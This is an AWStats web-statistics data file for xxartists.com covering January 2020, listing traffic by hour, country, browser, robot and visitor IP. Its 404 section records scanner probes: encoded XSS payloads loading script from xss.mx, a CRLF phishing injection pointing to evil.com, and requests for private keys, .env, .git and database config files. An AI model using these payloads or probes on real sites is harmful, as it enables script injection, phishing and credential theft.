AWSTATS DATA FILE 7.7 (build 20180105)
# If you remove this file, all statistics for date 202001 will be lost/reset.
# Last config file used to build this data file was /home/ivmml6thueds/tmp/awstats/awstats.xxartists.com.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2014                
POS_TIME 2687                
POS_VISITOR 14065               
POS_DAY 35127               
POS_DOMAIN 3604                
POS_LOGIN 4228                
POS_ROBOT 4383                
POS_WORMS 5509                
POS_EMAILSENDER 5640                
POS_EMAILRECEIVER 5783                
POS_SESSION 35835               
POS_SIDER 36042               
POS_FILETYPES 5918                
POS_DOWNLOADS 6127                
POS_OS 6175                
POS_BROWSER 6490                
POS_SCREENSIZE 8481                
POS_UNKNOWNREFERER 8555                
POS_UNKNOWNREFERERBROWSER 9234                
POS_ORIGIN 9617                
POS_SEREFERRALS 9761                
POS_PAGEREFS 9970                
POS_SEARCHWORDS 10510               
POS_KEYWORDS 10719               
POS_MISC 2351                
POS_ERRORS 10839               
POS_CLUSTER 4084                
POS_SIDER_404 10944               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20200201000044 7733 2335356 4644481379201
FirstTime 0
LastTime 20200131230423
LastUpdate 20200201055058 7733 0 7732 0 0
TotalVisits 503                 
TotalUnique 407                 
MonthHostsKnown 0                   
MonthHostsUnknown 575                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
PDFSupport 0 0 0
TotalMisc 0 0 0
RealPlayerSupport 0 0 0
AddToFavourites 0 0 0
FlashSupport 0 0 0
JavaEnabled 0 0 0
DirectorSupport 0 0 0
JavascriptDisabled 0 0 0
WindowsMediaPlayerSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 12 243 19574990 16 103 6701552
1 14 433 43884225 10 22 437909
2 9 253 22178718 17 100 6784503
3 7 155 12752030 7 99 7489650
4 6 87 7886851 20 25 837296
5 17 200 18653823 14 100 6706602
6 11 183 16439958 7 14 36237
7 4 77 6476956 11 21 175799
8 19 450 38740857 16 106 6717685
9 13 256 20979707 40 47 69342
10 31 858 82634464 10 107 8134803
11 31 528 47084027 47 66 588643
12 56 1546 125321790 18 28 451103
13 25 830 67145551 20 42 1640319
14 41 1203 94298427 14 27 196304
15 90 3061 243706809 19 118 6749566
16 73 2162 175993730 15 52 3692796
17 46 961 76195485 13 28 224814
18 89 2354 175840370 33 89 984183
19 84 3169 255207126 19 69 4367779
20 83 2740 227257440 32 129 7169008
21 58 1713 143346345 19 197 15006706
22 52 1687 135172195 14 108 6830432
23 45 1260 101450284 25 117 6834812
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 25
us 751 22643 1833857045
ca 34 1160 93846303
cn 22 219 26237524
zz 19 19 83106
gb 14 452 38237129
nl 14 483 39061121
de 10 247 19835105
ru 10 111 10929429
in 8 203 18291524
fr 8 167 13177566
ie 4 179 19476507
br 3 98 8332294
au 2 76 6419563
pt 2 13 1611971
ph 2 86 6662485
at 2 75 6315861
nz 2 75 6315861
be 2 76 6419563
eg 1 12 1583650
id 1 2 41743
ua 1 1 4374
ir 1 1 4144
vn 1 9 1470002
kh 1 1 4144
ch 1 1 4144
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 25
link 920 72899681 20200131234423 0
facebookexternalhit/ 99 6193263 20200131215139 0
Googlebot/ 97 1619993 20200131104352 0
crawl 87 6721720 20200129055057 0
bot[\s_+:,\.\;\/\\-] 38 158802 20200129211540 0
DuckDuckGo\-Favicons\-Bot/ 25 60989 20200131035532 0
Sogou[\x20]web[\x20]spider/ 25 96036 20200131112412 0
Python\-urllib/ 20 6539800 20200130215640 0
bingpreview 14 2247840 20200131044437 0
bingbot/ 13 432628 20200131074733 0
AhrefsBot/ 8 33697 20200131021610 0
Applebot/ 6 25224 20200131184422 0
Googlebot\-Image/ 6 20257 20200126113153 0
curl 5 144825 20200121180736 0
YandexBot/ 5 21086 20200131042314 0
msnbot/ 4 394498 20200119120848 0
MJ12bot/ 3 12611 20200126213337 0
Mail\.RU_Bot/ 3 12892 20200130183415 0
no_user_agent 3 28321 20200131125807 0
CFNetwork 3 11832 20200131163449 0
CCBot/ 2 8237 20200125110128 0
SemrushBot/ 2 8237 20200122072906 0
(firefox/)([0-9]\.|[0-1][0]\.) 2 8288 20200121053550 0
Validator\.nu/ 1 4374 20200129154905 0
Firefox/1\.5 1 28965 20200116025826 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 7
css 360 13573259 0 0
eot 2 196972 0 0
woff 3 293739 0 0
woff2 322 24846156 0 0
html 589 5191164 0 0
png 24785 2071575010 0 0
js 348 42545858 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 0
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 18
winxp 7 7
macosx10 5 5
win8 1 1
win10 4844 161
unix 75 2
macosx12 337 11
macosx 5467 174
macosx11 236 6
winlong 11 2
win7 508 73
ios_iphone 11104 307
ios_ipad 75 2
linux 494 28
macosx8 1 1
win8.1 78 3
macosx9 2 2
Unknown 140 51
linuxandroid 3024 80
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 92
chrome70.0.3538.110 87 3
edge18 246 6
chrome15.0.864.0 1 1
firefox68.0 85 2
safari13.0.3 275 10
opera65.0.3467.78 77 2
chrome56.0.2924.87 62 2
msie6.0 1 1
firefox59.0 1 1
chrome75.0.3770.90 84 2
chrome76.0.3809.132 85 2
Unknown 52 34
chrome74.0.3729.169 342 17
chrome45.0.2454.94 1 1
chrome28.0.1468.0 1 1
chrome78.0.3904.96 85 2
netscape5.0 6 5
chrome79.0.3945.93 76 2
chrome26.0.1410.65 1 1
chrome78.0.3904.97 9 9
chrome70.0.3538.102 73 2
mozilla 160 16
chrome71.0.3578.141 76 2
firefox28.0 1 1
chrome49.0.2623.75 4 2
chrome56.0.2925.37 1 1
firefox 1 1
chrome57.0.2987.133 170 4
chrome77.0.3865.75 86 2
chrome72.0.3626.109 43 43
opera11.01 1 1
chrome79.0.3945.136 1746 42
edge16 1 1
chrome41.0.2228.0 1 1
safari12.1.2 377 10
chrome79.0.3945.86 75 2
chrome61.0.3163.100 3 3
chrome79.0.3945.117 2834 87
firefox71.0 151 3
chrome67.0.3396.87 1 1
chrome79.0.3945.88 1027 30
chrome76.0.3809.100 85 3
chrome40.0.2214.89 3 3
opera54.0.2952.64 1 1
firefox23.0 1 1
chrome70.0.3538.67 1 1
chrome75.0.3765.0 17 2
chrome35.0.1916.47 1 1
chrome78.0.3904.70 1 1
chrome70.0.3538.77 3 3
firefox62.0 76 2
safari 412 14
chrome75.0.3770.142 6 3
chrome74.0.3729.108 1 1
msie7.0 9 0
chrome69.0.3497.100 1 1
chrome74.0.3729.131 1 1
chrome66.0.3359.117 1 1
chrome63.0.3239.84 102 22
firefox27.0 9 6
chrome72.0.3626.121 1 1
chrome18.0.1025.45 1 1
chrome75.0.3770.100 28 2
chrome71.0.3578.98 3 3
safari12.1.1 159 4
chrome45.0.2454.101 4 4
msie11.0 154 5
chrome17.0.963.65 1 1
ibrowse 1 0
iphone 5885 149
chrome79.0.3945.79 77 4
firefox72.0 425 6
chrome64.0.3282.167 1 1
safari13.0.5 1 1
chrome36.0.1985.143 21 1
chrome78.0.3904.108 237 6
chrome58.0.3029.110 2 2
safari13.0.4 3976 122
firefox69.0 1 1
safari11.0 766 19
msie8.0 86 4
firefox35.0 2 2
safari12.0 93 4
chrome13.0.782.112 1 1
firefox48.0 1 1
chrome77.0.3865.92 76 2
firefox58.0 2 2
chrome79.0.3945.130 4324 112
chrome73.0.3683.103 327 8
firefox64.0 9 4
chrome51.0.2704.103 1 1
chrome79.0.3945.116 603 16
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 15
Ruby 20200109160446
Mozilla/5.0_(compatible;_Dataprovider.com) 20200113231255
Mozilla/5.0_Firefox/35.0 20200119231658
Go-http-client/1.1 20200129223347
Mozilla/5.0_(compatible;_Google-Site-Verification/1.0) 20200131113041
cortex/1.0 20200131230254
ia_archiver 20200130150623
Mozilla/5.0_(compatible;_Panscient/1.0;__http://panscient.com/faq.htm) 20200114150312
adreview/1.0 20200131230252
Dispatch/0.11.3 20200130054400
Mozilla/5.0_zgrab/0.x 20200130064455
python-requests/2.22.0 20200131172655
python-requests/2.12.4 20200119065223
python-requests/2.21.0 20200115143702
Orbo 20200119085735
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 10
Go-http-client/1.1 20200129223347
adreview/1.0 20200131230252
Dispatch/0.11.3 20200130054400
Ruby 20200109160446
Orbo 20200119085735
ia_archiver 20200130150623
python-requests/2.12.4 20200119065223
python-requests/2.22.0 20200131172655
cortex/1.0 20200131230254
python-requests/2.21.0 20200115143702
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 484 1319
From1 1 1
From2 7 7
From3 99 272
From4 325 24810
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 5
sogou 3 3
bing 1 1
att 1 1
r_search_yahoo_com 1 1
duckduckgo 1 1
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 12
http://m.facebook.com 32 32
https://l.instagram.com 25 25
http://m.facebook.com 16 16
http://progressive-seo.com 9 9
http://l.instagram.com 6 6
http://basichttpserverv3.venus.odin.sogou/post 3 176
https://t.co/LN2ORKYusd 2 2
https://www.linkedin.com 2 2
https://www.facebook.com 1 1
http://www.ninacecillia.top/blog/9836910/profile/ 1 1
https://m.facebook.com 1 1
http://l.instagram.com 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 3
site+www.xxartists.com 3
http+//xxartist.com/ 1
amazon 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 5
site 3
www.xxartists.com 3
amazon 1
http 1
//xxartist.com/ 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 2
404 347 358003
206 50 735744
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 74
/about-us 5 -
/xxartists.com.key 2 http://xxartists.com/
/0xb4d1d34%27%22%3E%3C/title%3E%3C/style%3E%3C/textarea%3E%3C/script%3E%3Cscript%20src=//xss.mx%3E%3C/script%3E 1 http://xxartists.com/
/about-our-store 5 -
/0xb4d1d34%27%22%3E%3C/title%3E%3C/style%3E%3C/textarea%3E%3C/script%3E%3Cscript%3Ealert%60hello%60%3C/script%3E 1 http://xxartists.com/
/wordpress/ 1 -
/%22%0D%0A/%3E%3Ch1%3E%3Ca%20href%3Dhttps://evil.com%3EYour%20password%20is%20currently%20unsafe,%20please%20click%20the%20link%20to%20update%20the%20information%3C/a%3E%3C/h1%3E/ 1 http://xxartists.com/
/id_rsa 1 http://xxartists.com/
/config/databases.yml 1 http://xxartists.com/
/our-story 5 -
/apple-touch-icon-precomposed.png 12 -
/contact 5 -
/wp-login.php 4 -
/wp/ 1 -
/.env 10 -
/about-the-blog 5 -
/about 5 -
/search/foo%22%3E%3Cscript%20src=//xss.mx%3E%3C/script%3E%3Cx=%22 1 http://xxartists.com/
/index.php 1 -
/privatekey.key 1 http://xxartists.com/
/key.pem 1 http://xxartists.com/
/privacy-policy 5 -
/myserver.key 1 http://xxartists.com/
/id_dsa 1 http://xxartists.com/
/xxartists.pem 1 http://xxartists.com/
/myadmin/print.css 1 -
/.git//index 1 -
/apple-touch-icon-120x120.png 3 -
/_wpeprivate/config.json 1 http://xxartists.com/
/phpmyadmin/print.css 1 -
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 4 -
/CHANGELOG.txt 2 -
/about-our-shop 5 -
/googlead50ead37b4a3f60.html 3 -
/.git/HEAD 7 -
/googleed1d36f109db892d.html 3 -
/search 1 http://xxartists.com/
/our-mission 5 -
/mission 5 -
/.git/config 1 -
/0x01%22%3E%3Cimg%20src=x%20onerror=alert%60hello%60%3E%22%3E 1 http://xxartists.com/
/search/SearchResult.aspx 1 http://xxartists.com/
/foo%27%22%3E%3Cscript%20src=//xss.mx%3E%3C/script%3E%3Cx=%22 1 http://xxartists.com/
/robots.txt 159 -
/affiliate 5 -
/sitemap.xml 6 -
/xxartists.com.pem 2 http://xxartists.com/
/database/print.css 1 -
/store/app/etc/local.xml 1 http://xxartists.com/
/README.txt 2 -
/pma/print.css 1 -
/contact-us 5 -
/apple-touch-icon-120x120-precomposed.png 3 -
/user/register/ 1 -
/mysql/print.css 1 -
/ads.txt 2 -
/disclaimer 5 -
/phpMyAdmin/print.css 1 -
/media/system/js/core.js 2 -
/core/CHANGELOG.txt 2 -
/GDPR 5 -
/1%27%22%3E%3Ciframe%20srcdoc=%27%3Cscript%20src=%22data:text/javascript,alert%28/hello/%29%22%3E%3C/script%3E%27%3E%3C/iframe%3E 1 http://xxartists.com/
/license.txt 2 -
/.ssh/id_rsa 1 http://xxartists.com/
/xxartists.key 1 http://xxartists.com/
/admin.php 1 -
/config/database.yml 1 http://xxartists.com/
/foo%0D%0A%0D%0A%22%3E%3Cscript%20src=//xss.mx%3E%3C/script%3E%3Cx=%22 1 http://xxartists.com/
/1337%22%3E%3Cnoscript%3E%3Cp%20title=%22%3C/noscript%3E%3Cimg%20src=x%20onerror=alert%60hello%60%3E%22%3E 1 http://xxartists.com/
/.ssh/id_dsa 1 http://xxartists.com/
/xmlrpc.php 3 -
/administrator/index.php 1 -
/privacy 5 -
/app/etc/local.xml 1 http://xxartists.com/
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 575
24.176.217.66 91 3251 270681343 20200131161405
172.115.34.22 28 1084 85924290 20200130225404
172.83.43.136 19 19 83106 20200130000252
13.64.93.136 14 14 432992 20200131173924
173.198.56.105 9 324 26152709 20200130124121
52.24.27.166 8 327 26401962 20200130215626
98.159.95.137 7 238 19401995 20200131171310
73.71.12.35 7 425 15267800 20200128190558
104.175.173.70 7 242 20390127 20200128204502
24.176.202.139 6 247 20443460 20200131162804
31.201.57.56 6 237 19393254 20200127162104
173.239.154.66 6 258 19987398 20200127154330
104.174.120.3 6 165 13091537 20200130225410
75.82.198.171 5 157 12814751 20200115153550
174.220.0.49 5 173 13366582 20200131230423
192.255.70.112 5 5 144825 20200123014200
73.158.44.241 5 177 14979649 20200115140651
108.60.33.226 5 123 10722003 20200131172032
162.246.44.18 4 162 13082048 20200128150527
166.182.255.111 4 171 13324007 20200128162725
67.248.96.113 4 171 13326996 20200131200609
174.193.207.86 4 144 6538468 20200118144236
173.167.124.214 4 98 12026002 20200123141436
24.18.198.10 4 165 13088100 20200127125225
54.89.176.199 4 4 131560 20200128165608
98.148.81.57 2 75 6419026 20200123203758
205.175.210.114 1 1 0 20200113173030
111.202.102.74 0 2 153933 
174.21.4.185 1 1 4093 20200112212829
123.126.68.115 0 1 3373 
123.126.113.19 0 1 613900 
104.132.243.84 2 74 6314898 20200113163559
179.220.242.228 2 85 6661946 20200128092734
172.58.238.191 2 85 6661526 20200131194037
36.110.147.85 0 2 94836 
23.240.237.153 3 87 6666748 20200131163449
104.222.43.15 0 1 537 
34.219.173.241 1 1 32890 20200127183526
66.249.93.82 1 16 2523085 20200111034817
71.115.215.53 2 84 6660989 20200131204010
74.111.17.184 2 84 6660989 20200131194644
69.207.125.58 2 84 6660989 20200131201352
36.110.147.105 0 1 1267 
64.60.113.254 2 84 6660985 20200130182604
72.90.85.218 2 84 6660989 20200131193953
40.94.36.78 0 6 963253 
183.36.115.12 0 1 15769 
171.13.14.52 0 1 122437 
71.36.113.21 1 1 4374 20200126103624
104.229.143.245 2 85 6661526 20200131193917
23.239.180.16 1 1 32890 20200129091432
34.222.117.168 2 2 57930 20200121210532
71.68.108.135 2 75 6315861 20200114094322
104.222.33.5 0 1 537 
108.26.26.171 2 84 6660989 20200131201736
49.7.20.28 3 3 12432 20200124205004
86.159.91.115 2 76 6419563 20200125183617
158.69.27.211 3 3 84963 20200113231126
104.132.34.107 2 84 6660985 20200128161855
23.239.180.250 1 1 32890 20200127090057
174.254.67.29 0 69 4843995 
183.36.114.134 0 1 780334 
174.247.177.13 2 84 6660989 20200131195129
3.92.231.39 2 22 2728610 20200128223034
45.48.15.134 2 74 6314898 20200114054952
166.137.8.23 2 76 6419989 20200122194806
208.72.101.42 2 75 6315861 20200110133156
36.110.147.78 0 1 3616 
183.36.114.186 0 1 613900 
40.94.95.11 0 12 1028030 
18.236.174.82 3 3 94752 20200131173923
31.13.115.23 0 14 2746399 
104.222.33.12 1 1 32890 20200128131139
52.114.142.71 1 2 28858 20200114183821
58.22.64.169 1 1 4374 20200127171746
174.193.208.170 2 84 6660989 20200131202259
36.110.147.81 0 1 48205 
40.94.36.22 1 15 1547707 20200130171609
66.249.88.208 0 10 1001270 
72.211.229.220 2 76 6419989 20200120193042
173.252.87.2 0 1 15533 
66.220.149.28 1 29 3242122 20200123181936
76.175.66.217 2 86 6662485 20200129200724
67.253.41.138 2 84 6660989 20200131203117
71.238.70.125 2 75 6315861 20200113182517
172.58.23.229 2 76 6419563 20200115205336
36.110.147.84 0 2 230397 
65.155.30.101 2 84 6660985 20200130135521
66.249.93.30 1 1 4374 20200129154904
172.58.23.133 2 86 2984572 20200125233637
183.36.114.167 0 1 41266 
165.22.201.125 1 1 4374 20200127191240
188.165.235.173 1 1 4374 20200130122631
31.13.115.21 1 13 1960982 20200129230931
166.170.14.18 2 76 6419563 20200119205358
45.48.231.63 2 74 6315324 20200111181523
34.221.90.254 1 1 32890 20200128121439
49.36.8.180 2 77 6420526 20200122153747
173.252.127.6 0 36 2248876 
183.36.115.13 0 3 856712 
106.120.188.157 0 2 9953 
184.168.224.230 1 1 4093 20200109160446
183.36.115.5 0 1 164796 
68.224.173.69 2 76 6419563 20200116151247
173.252.87.47 0 1 613900 
27.97.84.121 2 76 6419563 20200123231525
66.220.149.17 1 26 4348456 20200117214431
212.103.50.77 1 1 28965 20200118103421
183.36.114.89 0 1 15649 
173.252.87.9 0 1 613900 
123.126.113.16 0 2 153947 
198.74.249.160 2 86 6662485 20200130145631
139.59.17.144 2 76 6419563 20200117144140
159.69.178.29 1 1 4144 20200124150037
173.252.95.41 0 1 613900 
66.249.88.212 0 10 1801942 
106.120.188.131 0 1 3458 
46.189.27.100 1 1 0 20200122061859
123.125.125.30 0 1 1860 
72.65.50.208 2 84 6660989 20200131194106
67.242.35.49 2 84 6660989 20200131193314
104.222.33.24 0 1 537 
36.110.147.97 0 1 780334 
31.13.127.20 0 1 613900 
31.13.115.25 0 4 898737 
106.120.188.164 0 2 52747 
109.130.195.181 2 76 6419563 20200119103440
173.252.95.40 0 1 613900 
198.108.66.176 1 1 4374 20200130035634
106.120.188.160 0 1 69060 
123.126.68.134 0 2 180329 
66.240.236.119 1 1 28321 20200112181140
24.163.75.194 2 85 6661503 20200126220349
174.114.107.129 2 77 6420526 20200124205838
216.114.152.47 2 75 6315861 20200110211922
54.189.187.188 1 1 32890 20200128110317
31.13.115.13 0 30 1591580 
182.76.13.154 1 1 28965 20200123074225
23.252.240.47 1 1 28321 20200109193648
34.221.80.250 1 1 4147 20200115143702
68.52.121.110 2 86 6662485 20200130164724
142.252.77.166 1 1 4374 20200127224053
114.119.154.7 1 1 4144 20200125020019
66.220.149.40 0 25 693711 
185.216.35.74 2 76 6419563 20200115221837
99.233.19.174 3 80 6424670 20200118222912
198.108.66.64 1 1 4374 20200130064455
31.13.127.14 1 31 2092221 20200131210238
143.223.135.6 2 75 6315861 20200114084816
108.6.27.13 2 86 6662485 20200130125501
34.221.203.151 2 2 61855 20200127183525
52.12.152.85 1 1 28965 20200120160033
54.196.75.172 2 2 8186 20200113045748
172.58.94.227 2 9 1558980 20200114182555
8.46.75.70 0 3 1572534 
107.77.92.86 3 75 6318991 20200114183239
106.120.188.133 0 1 666 
3.12.107.176 3 6 173909 20200131120748
104.222.43.157 0 1 537 
99.203.118.2 2 84 6660989 20200131200924
95.216.15.49 1 1 4374 20200129093308
34.67.38.192 1 1 4144 20200119065223
174.6.21.51 2 77 6420526 20200118232756
38.93.172.66 1 1 28965 20200120123321
71.127.165.236 2 85 6661526 20200131193319
183.36.114.4 0 3 15174 
174.192.16.189 2 75 6318842 20200110155317
31.13.127.16 0 1 613900 
173.252.87.50 0 32 2300234 
31.13.115.9 0 1 613900 
104.182.63.75 3 88 6768347 20200128202813
23.226.211.16 1 1 32895 20200131115748
106.120.188.153 0 3 251763 
188.166.116.151 1 1 4374 20200127224725
36.110.147.101 0 4 497901 
85.10.207.246 1 1 32890 20200130164755
179.108.182.27 1 13 1670348 20200110055228
98.113.89.90 2 75 6315861 20200113195004
36.110.147.94 0 1 77673 
73.156.245.14 2 85 6661952 20200131194233
94.231.136.137 1 11 1518987 20200125094400
123.126.68.111 0 2 41026 
31.13.127.11 0 1 613900 
49.7.20.157 0 9 339170 
183.36.114.102 0 2 22986 
36.110.147.90 0 1 3626 
104.132.7.89 2 77 6420526 20200121152402
34.217.38.93 1 1 28321 20200110203247
45.23.234.202 2 85 6661526 20200131203957
54.149.98.75 1 1 28965 20200121163043
54.218.199.67 1 1 28965 20200118050457
54.186.178.251 1 1 32897 20200131174135
84.241.197.237 2 75 6315861 20200110061409
71.127.169.40 2 85 6661526 20200131193333
174.90.223.68 2 75 6419026 20200121155255
34.217.89.89 1 1 28965 20200122120724
31.23.196.123 1 8 1454677 20200127043138
37.189.101.168 1 12 1583650 20200117164832
123.126.68.126 0 1 15822 
172.58.45.134 2 86 6662485 20200130133907
184.101.225.51 2 75 6315861 20200114182950
104.175.170.84 2 85 6661948 20200130215405
183.36.114.153 0 2 11794 
99.60.19.1 2 85 6661503 20200126015059
69.171.251.5 0 19 1323221 
66.220.149.14 0 1 15533 
70.55.173.202 2 75 6419026 20200123235155
45.49.93.129 2 86 6662485 20200129175126
183.36.115.105 0 5 241071 
183.36.114.1 0 2 78109 
106.120.188.140 0 1 1864 
124.206.180.178 2 2 57930 20200119231658
76.206.206.100 2 86 6662485 20200130164733
36.110.147.95 0 1 3373 
173.241.168.174 2 75 6419026 20200118211516
183.36.114.152 0 3 653727 
162.213.39.108 1 1 4144 20200122041120
72.185.107.177 2 77 6420526 20200118225516
104.32.232.132 2 86 6662485 20200129215201
67.172.203.133 2 85 6661526 20200131194509
73.240.224.57 2 74 6314898 20200110172548
106.120.188.144 0 1 3439 
31.13.115.14 1 7 1022517 20200129230933
71.237.158.93 2 75 5275929 20200120160016
74.79.214.102 1 86 6589271 20200131195255
69.171.251.7 1 35 1480569 20200131230225
76.217.131.122 2 86 6662489 20200131160031
174.193.192.74 2 73 6314361 20200110065921
106.120.188.146 0 2 87700 
195.171.206.66 2 74 6314898 20200115080136
66.249.93.29 0 1 537 
18.214.15.252 1 1 32890 20200128165436
34.229.157.237 1 11 1364190 20200120165944
104.222.33.36 1 1 32890 20200128141604
106.120.188.159 2 2 81536 20200127013302
172.242.245.242 2 75 6419026 20200119230046
103.84.208.2 1 21 2298107 20200115061732
76.169.185.154 2 84 6660966 20200126111710
183.36.114.24 0 1 4175 
23.226.211.112 0 1 537 
172.58.23.238 2 77 6420526 20200124192043
106.120.188.151 0 1 571614 
183.36.114.90 0 1 3458 
36.110.147.102 0 1 9049 
88.189.155.187 2 86 6662485 20200130122410
172.58.21.156 2 74 6314898 20200114105239
104.132.127.78 2 75 6315861 20200113090056
108.12.31.56 2 85 6661526 20200131203931
34.201.241.200 1 1 32890 20200127214419
31.13.115.6 0 8 230541 
172.58.43.254 2 17 1837943 20200127100829
40.94.36.34 0 15 924369 
173.252.127.27 0 1 613900 
67.190.224.16 2 85 6661526 20200131194746
104.229.135.192 2 86 6662489 20200131193915
216.240.61.73 1 1 4374 20200127131350
106.120.188.137 0 1 3465 
23.226.211.191 1 1 32890 20200130083204
123.126.68.112 0 1 150457 
47.247.132.196 2 77 6423507 20200116170829
183.36.114.12 0 1 944 
198.27.110.162 2 73 6335112 20200114123652
199.244.88.124 1 1 4093 20200112054946
104.229.143.16 2 16 1822891 20200131194513
66.102.8.31 2 2 8526 20200131113040
180.249.94.191 1 2 41743 20200113185547
149.161.204.66 2 75 6419026 20200121115716
24.20.133.65 2 85 6661929 20200127184155
183.36.114.148 0 1 71398 
128.177.12.22 2 74 6314898 20200114141418
183.36.114.7 0 2 512260 
34.221.247.129 1 1 28965 20200121185037
64.227.94.234 1 1 4375 20200131172655
106.120.188.152 0 3 1768161 
47.187.11.22 3 132 9616194 20200109213824
47.41.3.245 2 77 6420526 20200121161052
34.218.81.75 2 2 61855 20200128165655
123.126.68.139 0 2 590349 
183.36.114.99 0 1 69060 
66.220.149.50 0 26 2248524 
178.22.70.78 1 1 4144 20200116080553
52.11.64.146 2 2 65780 20200128165916
31.13.127.23 1 25 1603428 20200131210240
52.87.171.209 1 11 1364421 20200131184317
35.132.134.137 2 84 6660985 20200128221418
107.144.239.124 2 74 6315324 20200110214813
106.120.188.138 0 1 256130 
24.44.54.235 2 75 6315861 20200113171736
71.115.143.106 2 84 6660989 20200131221819
99.203.66.8 2 75 6419026 20200116131721
34.217.51.242 1 1 28965 20200121163044
75.3.71.52 3 76 6319954 20200110185506
171.251.237.78 1 9 1470002 20200116064625
34.220.62.23 1 1 28965 20200121234033
166.88.161.206 0 1 37744 
67.253.41.17 2 84 6660989 20200131194522
96.255.208.4 2 76 6419563 20200121043826
166.170.5.95 1 1 4144 20200115232411
67.168.89.157 2 75 6419026 20200119075447
31.13.127.21 0 1 613900 
123.126.68.127 0 1 15769 
107.201.130.218 2 75 6419026 20200118194345
173.252.127.37 0 6 205470 
45.76.19.74 1 1 4093 20200114055814
123.126.68.113 0 1 4477 
69.171.251.25 0 1 15533 
66.102.8.27 3 3 13130 20200131113041
41.152.182.110 1 12 1583650 20200124121452
114.134.189.61 1 1 4144 20200116234305
183.36.114.5 0 1 15075 
199.188.118.129 1 1 28965 20200116070245
23.239.180.2 1 1 32890 20200130052207
52.90.76.63 2 2 65780 20200127235145
104.229.1.189 2 84 6660989 20200131210201
72.76.221.125 3 3 12279 20200114150312
24.185.83.86 2 75 6315861 20200113124642
40.94.36.33 0 9 1904315 
114.119.133.224 1 1 4093 20200115015202
159.138.158.108 1 1 4093 20200110114409
71.127.179.44 2 85 6661526 20200131223801
69.171.251.14 1 3 656041 20200131230225
68.119.237.127 2 75 6419026 20200124025126
104.222.43.172 0 1 537 
51.77.246.201 2 73 6314361 20200113231254
122.55.79.153 2 86 6662485 20200128171445
36.110.147.93 0 2 6730 
183.36.114.88 0 1 1860 
172.119.14.72 2 85 6661522 20200130012747
91.244.168.59 1 11 1518936 20200112050756
52.38.114.35 1 1 4144 20200125185002
52.24.181.233 2 84 6660985 20200129160812
69.171.251.34 0 12 1309215 
34.221.59.173 1 1 4144 20200117162940
183.36.115.82 0 6 448924 
183.36.114.159 0 1 20223 
195.201.232.65 2 2 8518 20200130153445
123.126.68.121 2 7 223585 20200115012722
74.111.30.138 2 84 6660989 20200131195554
71.176.106.238 2 84 6660989 20200131194826
106.120.188.135 0 1 86749 
183.36.115.83 0 1 3439 
123.125.125.74 0 1 60896 
40.94.95.29 1 18 989993 20200129124457
171.13.14.56 0 1 613900 
54.218.59.56 1 1 28965 20200122120724
52.2.28.246 1 1 4093 20200112133750
172.58.75.107 4 4 16576 20200115182302
67.170.185.107 2 86 6662485 20200128120901
36.110.147.92 0 1 64663 
107.77.97.25 2 19 2058800 20200119174928
104.175.49.251 2 75 6315861 20200110111140
66.102.8.29 1 1 4144 20200116182800
62.109.4.125 1 1 0 20200118173005
137.205.1.213 2 77 6420526 20200124123704
157.131.139.182 2 77 6420526 20200117105257
45.77.105.232 2 76 6419561 20200116213829
23.226.211.199 1 1 32895 20200131091119
173.252.127.38 0 14 1028777 
34.223.48.26 1 1 4144 20200117202437
